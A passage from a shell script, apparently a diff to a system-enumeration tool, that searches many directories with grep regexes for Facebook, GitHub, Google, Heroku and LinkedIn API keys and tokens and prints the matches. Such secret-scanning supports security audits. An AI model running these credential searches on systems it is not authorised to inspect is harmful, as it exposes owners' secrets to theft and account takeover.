-exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(facebook|fb)(.{0,20})?['\"][0-9a-f]{32}~${SED_RED}~" & +wait +print_3title "Searching Github (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~github(.{0,20})?['\"][0-9a-zA-Z]{35,40}~${SED_RED}~" & +wait +print_3title "Searching Google API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AIza[0-9A-Za-z_\-]{35}~${SED_RED}~" & +wait +print_3title "Searching Google Cloud Platform API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]~${SED_RED}~" & +wait +print_3title "Searching Google Drive Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +wait +print_3title "Searching Google Oauth Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +wait +print_3title "Searching Heroku API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +wait +print_3title "Searching LinkedIn Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +wait +print_3title "Searching LinkedIn Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed 